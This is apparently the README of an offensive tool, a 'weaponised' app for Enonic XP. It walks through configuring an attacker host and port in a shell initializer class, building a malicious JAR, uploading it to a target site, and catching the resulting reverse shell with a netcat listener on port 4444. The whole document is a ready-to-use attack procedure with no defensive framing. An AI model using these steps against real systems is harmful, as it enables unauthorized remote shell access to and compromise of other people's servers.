Weaponised app for exploitation of Enonic XP instances.
- Install econic cli
- Edit 'host' and 'port' in:
src/main/java/com/enonic/xp/demo/ShellInitializer.java
- Build the app by running the below in the project root directory.
enonic project deploy
- Then deploy the generated JAR to the target site via upload.
build/libs/evilenonic.jar
- Catch the shell. Safe hands.
nc -lnvp 4444